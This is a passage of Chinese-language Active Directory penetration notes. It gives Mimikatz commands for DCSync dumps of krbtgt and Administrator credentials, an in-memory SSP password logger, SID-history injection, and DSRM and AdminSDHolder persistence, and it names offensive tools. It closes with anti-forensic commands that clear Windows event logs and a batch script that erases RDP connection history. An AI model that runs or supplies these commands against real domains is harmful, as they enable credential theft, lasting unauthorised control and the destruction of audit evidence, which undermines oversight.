Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit
管理员用户帐户提取密码数据:
Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit
https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步
Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:巧用DSRM密码同步将域控权限持久化
DCshadow
简单的理解为SSP就是一个DLL,用来实现身份认证
privilege::debug
misc::memssp
这样就不需要重启c:/windows/system32可看到新生成的文件kiwissp.log
SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户
mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"
利用AdminSDHolder&SDProp(重新)获取域管理权限
https://adsecurity.org/?p=2716 策略对象在持久化及横向渗透中的应用
http://www.vuln.cn/6812
域渗透-Kerberoasting
Backdooring AdminSDHolder for Persistence
Unconstrained Domain Persistence
certified-pre-owned
证书伪造:pyForgeCert
SharpAddDomainMachine
《域渗透——Dump Clear-Text Password after KB2871997 installed》
《域渗透——Hook PasswordChangeNotify》
可通过Hook PasswordChangeNotify实时记录域控管理员的新密码
《域渗透——Local Administrator Password Solution》
域渗透时要记得留意域内主机的本地管理员账号
《域渗透——利用SYSVOL还原组策略中保存的密码》
BloodHound
CrackMapExec
DeathStar
利用过程:http://www.freebuf.com/sectool/160884.html
UltimateAppLockerByPassList https://lolbas-project.github.io/
获取日志分类列表:
wevtutil el >1.txt
获取单个日志类别的统计信息:eg.
wevtutil gli "windows powershell"
回显:
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
查看指定日志的具体内容:
wevtutil qe /f:text "windows powershell"
删除单个日志类别的所有信息:
wevtutil cl "windows powershell"
利用工具
run clearlogs
clearev
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit